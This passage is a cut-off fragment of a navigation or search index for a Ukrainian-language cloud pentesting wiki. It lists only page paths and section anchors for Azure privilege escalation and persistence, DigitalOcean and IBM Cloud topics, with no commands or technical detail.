embershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Привілейоване-підвищення-динамічних-груп","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Користувачі","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Політики-умовного-доступу-та-обхід-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Пристрої","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Інші-цікаві-дозволи-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---Політики-умовного-доступу-та-обхід-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Основна-інформація","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Перерахування","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Обходи-політик-умовного-доступу","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Платформи-пристроїв---Умова-пристрою","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Локації-Країни-діапазони-ip---Умова-пристрою","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Хмарні-додатки","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Інші-обходи-az-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Дзвінок","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Сумісні-пристрої","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Інструменти","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Посилання","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---Динамічні-Групи-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#Основна-Інформація","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#Приклад","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#Посилання","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#bucket-readwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#remote-debugging","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#Зміна-репозиторію-github","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#modify-network-restrictions","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowstriggerslistcallbackurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfiglistaction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftdbformysqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftdbforpostgresqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#action-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#Посилання","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleslistkeysaction-АБО-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread-if-az-cli-is-used","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Відправка-повідомлень-з-ключами-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-АБО-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#receive-with-keys-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Відправка-повідомлень-dataactions-microsoftservicebusnamespacesmessagessendaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Отримати-повідомлення-dataactions-microsoftservicebusnamespacesmessagesreceiveaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Посилання","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---static-web-apps-post-exploitation","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-static-web-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#Читання-налаштованих-облікових-даних-третьої-сторони","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#Перезаписати-файл---Перезаписати-маршрути-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#Специфічний-привілейований-доступ-до-файлових-ресурсів","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#Інші-цікаві-дозволи-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#Посилання","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversdatabasesdatamaskingpolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#Видалити-безпеку-на-рівні-рядків","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#az---virtual-desktop-privesx","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#azure-virtual-desktop-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftdesktopvirtualizationhostpoolsretrieveregistrationtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftauthorizationroleassignmentsread-microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---Віртуальні-машини-та-мережевий-привілейований-доступ","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#ВМ-та-мережа","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesread-microsoftcomputevirtualmachineswrite-microsoftcomputevirtualmachinesextensionsread-microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftcomputevirtualmachinesread-microsoftcomputedisksread-microsoftnetworknetworkinterfacesread-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputediskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistence","pentesting-cloud/azure-security/az-persistence/index.html#oauth-application","pentesting-cloud/azure-security/az-persistence/index.html#applications-and-service-principals","pentesting-cloud/azure-security/az-persistence/index.html#federation---token-signing-certificate","pentesting-cloud/azure-security/az-persistence/index.html#Федерація---Довірений-домен","pentesting-cloud/azure-security/az-persistence/index.html#Посилання","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#az---Автоматизаційні-облікові-записи-Постійну","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Привілейований-доступ-до-сховища","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Задня-дверка-в-існуючий-сценарій","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Розклад-та-вебхуки","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Шкідливе-ПЗ-всередині-ВМ-що-використовується-в-гібридній-групі-працівників","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Користувацькі-пакети-середовища","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#Компрометація-зовнішніх-репозиторіїв","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#az---logic-apps-persistence","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#logic-apps","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#Загальні-техніки-збереження","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#az---sql-persistence","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#sql","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#Загальні-техніки-збереження","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#az---queue-storage-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#queue","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#Посилання","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-vm-applications-vm-extensions--images","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-instances","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---storage-persistence","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#Загальні-трюки","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#basic-information","pentesting-cloud/azure-security/az-device-registration.html#tpm---Довірчий-модуль-платформи","pentesting-cloud/azure-security/az-device-registration.html#Реєстрація-пристрою-з-токенами-sso","pentesting-cloud/azure-security/az-device-registration.html#Перезаписування-квитка-пристрою","pentesting-cloud/azure-security/az-device-registration.html#Перезаписати-ключ-whfb","pentesting-cloud/azure-security/az-device-registration.html#references","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/index.html#Основна-енумерація","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#Проекти","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#Перерахування-послуг","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Основні-відмінності-від-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ієрархія","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Користувач","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Команда","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Проект","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Дозволи","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Команда-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ролі","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Доступ","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Імя-користувача--пароль-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#api-ключі","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ключі-доступу-до-spaces","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#oauth-application","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#ssh-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#functions-authentication-token","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Логи","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Логи-користувача","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Логи-команди","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Посилання","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---Дозволи-для-Пентесту","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---Послуги","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce-та-зашифровані-змінні-середовища","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#Зєднання","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---Бази-даних","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#Деталі-підключення","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#Аутентифікація","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#Брандмауер","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---Функції","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#Тригери","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#Зєднання","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#do---networking","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#Домені","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#Зарезервовані-ip-адреси","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#Балансувальники-навантаження","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#vpc","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#do---Проекти","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#do---spaces","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#Доступ","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#Перерахування","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#do---volumes","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#Основна-інформація","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#Перерахування","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting-1","pentesting-cloud/ibm-cloud-pentesting/index.html#Що-таке-ibm-cloud-Від-chatgpt","pentesting-cloud/ibm-cloud-pentesting/index.html#ssrf","pentesting-cloud/ibm-cloud-pentesting/index.html#Посилання","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#ibm---hyper-protect-crypto-services","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#Основна-інф